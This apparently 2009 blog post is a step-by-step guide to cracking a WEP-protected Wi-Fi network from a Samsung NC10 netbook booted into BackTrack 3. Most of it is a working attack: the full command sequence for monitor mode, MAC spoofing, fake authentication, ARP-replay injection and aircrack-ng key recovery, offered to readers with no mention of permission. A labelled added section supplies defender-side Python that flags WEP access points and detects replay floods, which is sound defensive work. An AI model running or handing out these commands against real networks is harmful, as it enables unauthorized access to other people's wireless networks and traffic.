Thursday 28 May 2009

Backtrack And Samsung Nc10 Wep Cracking

I wanted to see if it was possible to crack a WEP encrypted access point using my Samsung NC10. I was very doubtful whether this would work or not, but to my surprise it worked like a treat! My Samsung NC10 has an Atheros AR5007EG chipset for the inbuilt wireless. I found in the past that Backtrack loves Atheros based chipsets.

It is important to know whether your wireless card can be used in monitor mode, and also whether your wireless adapter supports packet injection.

The first thing I did was head over to www.remote-exploit.org/backtrack.html

I then downloaded the Backtrack 3 USB version, which is 784MB in size. When the file is downloaded you will notice that it is an ISO image. Obviously my Samsung NC10 is a netbook that doesn't have a CD-ROM drive, so I need to copy that exact image to a USB pen drive.

Head over to http://unetbootin.sourceforge.net and download the file; it's not too big! Once you have Unetbootin on your computer you can run the program and select the location of the ISO image you downloaded from the Backtrack website.

You then want to select the drive letter of your USB drive.

Burn the image to the pen drive and within a few minutes you will have a bootable Backtrack 3 USB drive. Fire up your Samsung NC10 and press F2 quickly to enter the BIOS screen; you want to change the boot priority order to make sure your netbook boots from the USB drive. Once this is done, plug in your USB drive and reboot the computer, and you should see a menu screen appear with loads of different options. I found with the NC10 that selecting KDE with VESA was the option that worked well for me, and within a few minutes you will hear the startup sounds and the desktop will appear.

Now you have Backtrack all fired up you will need to open a terminal window; you can open one by clicking on the black icon in the taskbar area.

Now here are the terminal commands I used to succeed in finding the WEP key of my desired access point.

modprobe ath_pci

modprobe ipwraw

iwconfig (gets list of interfaces/network cards on laptop)

airmon-ng stop ath0

ifconfig wifi0 down

macchanger --mac 00:11:22:33:44:66 wifi0

airmon-ng start wifi0

airodump-ng ath0 (gives available routers)

cd /mnt/hda2/ (can do this to change the place to save the captured data)

airodump-ng -c 6 -w network.out --bssid 00:21:21:21:21:21 ath0


aireplay-ng -1 0 -a 00:21:21:21:21:21 -h 00:11:22:33:44:66 -e ssidnamehere ath0

you should get:
15:56:18 Association successful :-) (AID: 1)

aireplay-ng -3 -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:21:21:21:21:21 -h 00:11:22:33:44:66 ath0

cd /mnt/hda2 (Used this to re-locate to the directory where the captured data is)

aircrack-ng -n 128 -b 00:21:21:21:21:21 network.out-01.cap
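The command sequence above is noisy from the access point's side of the air: the fake-authentication step associates a client with a made-up MAC, and the ARP-replay step (aireplay-ng -3) fires a large number of identical-length data frames at the AP in a few seconds so that it emits enough fresh IVs for aircrack-ng. The following is an added example, not code from the original post, showing how a defender can use that footprint: it takes an airodump-style scan table to list APs still running WEP (the fix is migrating them off WEP entirely), and it runs a sliding-window check over constructed frame metadata to flag a client sending a burst of same-length frames. The record layout, the 2-second window, the 200-frame threshold and the sample frame lengths are all assumptions chosen for the demonstration.

```python
"""Defender-side checks for the WEP attack pattern described in the post.
Added example, not code from the original post. Frame records and the scan
table are constructed sample data; the window and threshold are assumptions.
"""
from collections import defaultdict, deque

# Assumed minimal frame record, as a monitor-mode capture summary would give:
# (timestamp_seconds, source_mac, bssid, frame_length_bytes)

AP_BSSID = "00:21:21:21:21:21"          # BSSID used in the post
SPOOFED_CLIENT = "00:11:22:33:44:66"    # spoofed client MAC used in the post
BENIGN_CLIENT = "00:aa:bb:cc:dd:01"     # constructed benign client


def wep_networks(scan_rows):
    """Return sorted BSSIDs of APs whose privacy field starts with WEP.

    scan_rows: dicts with 'bssid', 'essid' and 'privacy' keys, mirroring the
    columns of an airodump-ng summary (constructed here, not parsed from a file).
    These are the networks that need migrating to WPA2/WPA3; WEP cannot be
    made safe by configuration.
    """
    return sorted(r["bssid"] for r in scan_rows
                  if r["privacy"].strip().upper().startswith("WEP"))


def detect_replay_flood(frames, window_s=2.0, threshold=200):
    """Flag (src, bssid, length) triples that send >= threshold frames of one
    identical length within any window_s-second window.

    Replayed WEP ARP frames all have the same encrypted length, so a sliding
    window keyed on (source, bssid, length) separates a replay burst from
    ordinary traffic, whose lengths vary and whose rate is far lower.
    """
    windows = defaultdict(deque)   # key -> timestamps inside the current window
    alerts = set()
    for t, src, bssid, length in sorted(frames):
        key = (src, bssid, length)
        q = windows[key]
        q.append(t)
        while q and t - q[0] > window_s:   # drop timestamps older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts.add(key)
    return sorted(alerts)


def build_sample_scan():
    """Constructed scan table: one WEP AP (the post's BSSID) and one WPA2 AP."""
    return [
        {"bssid": AP_BSSID, "essid": "ssidnamehere", "privacy": "WEP"},
        {"bssid": "00:aa:00:aa:00:aa", "essid": "office", "privacy": "WPA2"},
    ]


def build_sample_frames():
    """Constructed capture: 10 s of benign traffic (20 frames/s, mixed
    lengths) plus a 2 s burst of 400 identical 68-byte frames from the
    spoofed client, which is the replay pattern. 68 bytes is an assumed
    encrypted-ARP size; the detector only relies on the length being constant.
    """
    frames = []
    sizes = [68, 120, 340, 1500]
    for i in range(200):
        frames.append((i / 20.0, BENIGN_CLIENT, AP_BSSID, sizes[i % len(sizes)]))
    for i in range(400):
        frames.append((5.0 + i / 200.0, SPOOFED_CLIENT, AP_BSSID, 68))
    return frames


if __name__ == "__main__":
    for bssid in wep_networks(build_sample_scan()):
        print(f"WEP still enabled on {bssid}: migrate to WPA2/WPA3")
    for src, bssid, length in detect_replay_flood(build_sample_frames()):
        print(f"replay burst: {src} -> {bssid}, {length}-byte frames")
```

The benign client contributes only about five 68-byte frames per two-second window, well under the threshold, while the replay burst trips it after its first 200 frames. In a real deployment the frame records would come from a wireless IDS sensor in monitor mode, and the threshold would be tuned to the observed rate of legitimate same-length traffic (VoIP, for example, is also constant-length but at a much lower rate).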

This guide is not meant to be an expert tutorial but I thought it might help some people who are interested in wep cracking.